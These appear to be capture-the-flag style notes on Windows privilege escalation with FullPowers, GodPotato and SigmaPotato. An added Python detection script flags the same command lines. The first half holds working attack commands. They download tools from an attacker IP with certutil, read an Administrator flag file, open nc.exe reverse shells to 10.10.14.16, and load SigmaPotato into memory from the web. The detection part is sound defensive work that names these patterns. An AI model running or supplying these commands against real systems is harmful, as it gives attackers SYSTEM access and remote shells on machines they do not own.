# https://itm4n.github.io/localservice-privileges/
# With this tool, we can abuse a scheduled task function to get all the default privileges back, including SeImpersonatePrivilege.
CMD> FullPowers.exe
CMD> whoami /priv

# GodPotato
# https://github.com/BeichenDream/GodPotato
CMD> certutil -urlcache -split -f http://10.10.14.16/GodPotato-NET4.exe
CMD> GodPotato-NET4.exe -cmd "cmd /c whoami"
CMD> GodPotato-NET4.exe -cmd "cmd /c type C:\Users\Administrator\Desktop\root.txt"
CMD> certutil -urlcache -split -f http://10.10.14.16/nc.exe
Kali> rlwrap nc -nlvp 1235
CMD> GodPotato-NET4.exe -cmd "nc.exe -t -e C:\Windows\System32\cmd.exe 10.10.14.16 1235"

# SigmaPotato
# https://github.com/tylerdotrar/SigmaPotato
CMD> powershell [System.Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData("http://10.10.14.16/SigmaPotato.exe"))
Kali> rlwrap nc -nlvp 1236
CMD> [SigmaPotato]::Main(@("--revshell","10.10.14.16","1236"))
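
A defender's view of the commands above, as an added example that is not part of the original notes: a small triage function that flags the command-line shapes used here and, independently of any tool name, a SYSTEM process whose parent runs as a service account. The event field names (`User`, `ParentUser`, `CommandLine`) and the rule names are assumptions modelled on process-creation telemetry, and the sample events are constructed.

```python
import re

# Command-line shapes taken from the commands in these notes.
CMDLINE_RULES = {
    "certutil_url_download": re.compile(r"\bcertutil(\.exe)?\s.*-urlcache\b.*https?://", re.I),
    "assembly_load_from_web": re.compile(r"Assembly\]::Load\(.*DownloadData\(", re.I),
    "netcat_exec_shell": re.compile(r"\bnc(\.exe)?\s.*-e\s+\S*cmd\.exe", re.I),
}
SERVICE_USERS = {r"NT AUTHORITY\LOCAL SERVICE", r"NT AUTHORITY\NETWORK SERVICE"}
SYSTEM_USER = r"NT AUTHORITY\SYSTEM"


def triage(event):
    """Return the sorted names of all rules that fire for one process-creation event."""
    cmdline = event.get("CommandLine", "")
    hits = [name for name, rx in CMDLINE_RULES.items() if rx.search(cmdline)]
    # Tool-agnostic signal: a service-account parent should not produce a SYSTEM child.
    parent_is_service = event.get("ParentUser", "").upper() in SERVICE_USERS
    if parent_is_service and event.get("User", "").upper() == SYSTEM_USER:
        hits.append("system_child_of_service_account")
    return sorted(hits)


# Constructed sample events (hypothetical field names, values shaped like the notes).
LOCAL = r"NT AUTHORITY\LOCAL SERVICE"
SAMPLE_EVENTS = [
    {"User": LOCAL, "ParentUser": LOCAL,
     "CommandLine": "certutil -urlcache -split -f http://10.10.14.16/nc.exe"},
    {"User": SYSTEM_USER, "ParentUser": LOCAL, "CommandLine": "cmd /c whoami"},
    {"User": SYSTEM_USER, "ParentUser": LOCAL,
     "CommandLine": r"nc.exe -t -e C:\Windows\System32\cmd.exe 10.10.14.16 1235"},
    {"User": LOCAL, "ParentUser": LOCAL,
     "CommandLine": 'powershell [System.Reflection.Assembly]::Load((New-Object '
                    'System.Net.WebClient).DownloadData("http://10.10.14.16/SigmaPotato.exe"))'},
    # Benign control: certutil used for hashing by an interactive user.
    {"User": r"CORP\alice", "ParentUser": r"CORP\alice",
     "CommandLine": r"certutil -hashfile C:\temp\a.bin SHA256"},
]


def triage_all(events):
    """Pair each event's command line with the rules it triggered."""
    return [(e["CommandLine"], triage(e)) for e in events]


if __name__ == "__main__":
    for cmdline, hits in triage_all(SAMPLE_EVENTS):
        print(f"{hits or ['clean']}: {cmdline}")
```

The parent/child user check is the durable signal: it still fires if the binary is renamed or replaced, whereas the command-line patterns only cover the specific invocations shown in these notes.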